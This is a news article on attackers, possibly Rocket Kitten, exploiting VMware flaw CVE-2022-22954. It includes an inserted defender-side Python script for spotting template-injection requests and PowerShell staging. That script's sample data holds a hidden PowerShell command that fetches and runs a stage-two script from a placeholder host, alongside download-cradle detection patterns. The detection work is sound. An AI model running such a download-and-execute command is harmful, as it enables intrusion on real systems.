A team of Iranian cyber-spies dubbed Rocket Kitten, for one, is likely behind attempts to exploit a critical remote-code execution vulnerability in VMware’s identity management software, according to endpoint security firm Morphisec.
Earlier this month, VMware disclosed and fixed the security flaw, tracked as CVE-2022-22954, in its Workspace ONE Access and Identity Manager software. In terms of CVSS severity, the bug was rated 9.8 out of 10. We note the virtualization giant revised its advisory on the matter on April 13 to say miscreants had exploited the vulnerability in the wild.
The bug involves server-side template injection, and can be abused by anyone with network access. Exploitation essentially clears the way for intruders to deploy ransomware, steal data, and perform any other dirty deeds.
Finding and exploiting a vulnerability in VMware’s platform is especially appealing due to the company’s expansive reach into basically every enterprise on the planet. More than 500,000 organizations globally use its virtualization and cloud computing software, according to the vendor.
VMware patched its flawed software on April 6, and attackers were not far behind. A proof-of-concept exploit emerged on April 11, and two days later malicious exploitation was seen in the wild, according to Morphisec.
The security shop’s analysis, published this week, claimed that advanced persistent threat groups are behind the exploitation, and have used the vulnerability to install HTTPS-based backdoors in victims’ networks. They also noted the “tactics, techniques, and procedures used in the attack are common among groups such as the Iranian linked Rocket Kitten.”
Rocket Kitten, which is thought to be sponsored by Tehran, targets government agencies, defense contractors, academic institutions, and journalists in North America, Europe, and the Middle East for cyber-espionage purposes.
We’re told the VMware server-side template injection flaw affects an Apache Tomcat component, and could allow Rocket Kitten, or any other miscreants, to execute malicious commands on a host server. After gaining entry through this hole, intruders used PowerShell to download and run the next stage: the PowerTrash Loader, which Morphisec noted is “a highly obfuscated PowerShell script with approximately 40,000 lines of code.”
The loader decompresses a payload and injects it into memory. The final payload in the attack was a Core Impact agent, which is a legitimate penetration-testing tool.
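The two stages described above, a template-injection request against the web tier followed by a PowerShell download-and-run step, both leave traces a defender can hunt for. The script below is an added illustration, not Morphisec's analysis code, VMware's software or the exploit itself: it scans constructed access-log lines for template-expression syntax in the request target and scores constructed PowerShell command lines against generic download-cradle and obfuscation indicators. The log layout, the indicator lists, the scoring threshold and every sample line are assumptions made for the example, and the template markers are generic engine syntax rather than this vulnerability's payload.

```python
"""Defender-side triage for the two stages described in the article.

Added example, not code from Morphisec, VMware or the attackers. The access-log
format, indicator regexes, threshold and sample lines are all assumptions.
"""
import re
from urllib.parse import unquote

# Generic template-expression openers (FreeMarker/Velocity/Jinja-style syntax).
# Assumption: these are engine-generic markers, not this CVE's specific payload.
TEMPLATE_MARKERS = ("${", "#{", "{{", "<#", "<@")

# Apache/Tomcat "common" access-log layout; assumption about the log source.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators commonly associated with PowerShell staging; assumption-based list.
PS_INDICATORS = {
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),
    "memory_injection_api": re.compile(r"VirtualAlloc|WriteProcessMemory|CreateRemoteThread|\[Reflection\.Assembly\]::Load", re.I),
    "decompress": re.compile(r"GzipStream|DeflateStream|Decompress", re.I),
}


def find_template_injection_attempts(lines):
    """Return access-log entries whose request target contains template syntax.

    The target is URL-decoded twice so a double-encoded marker is still seen.
    """
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue  # not in the assumed log layout; skip rather than guess
        target = unquote(unquote(m.group("target")))
        markers = [mk for mk in TEMPLATE_MARKERS if mk in target]
        if markers:
            hits.append({
                "ip": m.group("ip"),
                "target": m.group("target"),
                "decoded": target,
                "markers": markers,
                "status": int(m.group("status")),
            })
    return hits


def score_powershell(cmdline, threshold=2):
    """Count staging indicators in a PowerShell command line.

    A single indicator (e.g. a hidden window) is common in admin scripts, so the
    line is flagged only when at least `threshold` indicators co-occur.
    """
    reasons = [name for name, rx in PS_INDICATORS.items() if rx.search(cmdline)]
    return {"score": len(reasons), "reasons": reasons, "suspicious": len(reasons) >= threshold}


# Constructed sample data: benign first line, placeholder marker in the second.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [13/Apr/2022:10:01:02 +0000] "GET /catalog/index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [13/Apr/2022:10:01:09 +0000] "GET /app/search?q=%24%7Bexample%7D HTTP/1.1" 400 0',
]

# Constructed process command lines: a routine admin call and a download cradle.
SAMPLE_PS_CMDLINES = [
    'powershell.exe -NoProfile -Command Get-Service -Name WinRM',
    'powershell.exe -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'http://placeholder.invalid/stage2.ps1\')"',
]


if __name__ == "__main__":
    for hit in find_template_injection_attempts(SAMPLE_ACCESS_LOG):
        print("template syntax in request:", hit)
    for cmd in SAMPLE_PS_CMDLINES:
        print(score_powershell(cmd), "<-", cmd[:60])
```

The web-tier check is deliberately syntax-based rather than signature-based, so it will also surface probing against other template engines; expect some noise from applications that legitimately accept curly-brace syntax, and tune `TEMPLATE_MARKERS` per site. The PowerShell scorer is meant to be run over process-creation telemetry (e.g. Sysmon event 1 or Security event 4688 command lines), where the co-occurrence of a hidden window, a policy bypass and a download cradle in one invocation is the pattern worth alerting on.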
However, as Morphisec and others have noted, this and other pen-testing frameworks, such as Cobalt Strike and Metasploit, are used by cyber-crime gangs to maintain network access, exfiltrate information, run commands, deliver ransomware, and deploy other malicious payloads.
“As with other penetration testing frameworks, these aren’t always used with good intentions,” the researchers wrote, adding that Trend Micro found [PDF] “a modified version of Core Impact was used in the Woolen-GoldFish campaign tied to the Rocket Kitten APT35 group.”
Morphisec was able to extract the command-and-control server address, client version, and communication encryption key from the code; see the above write-up for the technical details. ®